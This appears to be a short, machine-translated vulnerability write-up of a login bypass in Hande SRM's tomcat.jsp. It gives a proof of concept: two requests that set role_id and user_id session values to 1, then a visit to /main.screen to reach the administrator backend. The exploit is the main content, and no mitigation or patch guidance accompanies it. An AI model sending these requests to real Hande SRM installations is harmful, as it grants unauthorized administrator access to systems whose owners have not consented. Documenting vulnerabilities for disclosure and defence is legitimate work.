Hande Srm Tomcat Jsp Login Bypass Vulnerability
Hande Srm Tomcat Jsp Login Bypass Vulnerability
Hande SRM tomcat.jsp Login bypass vulnerability
Vulnerability Description
The Hande SRM tomcat.jsp file has a login bypass vulnerability. The attacker can obtain the permissions of the background administrator by sending the request packet.
Vulnerability Impact
Hander SRM
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC (Tomcat session manipulation)
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
Visit the backend
/main.screen
This post is licensed under CC BY 4.0 by the author.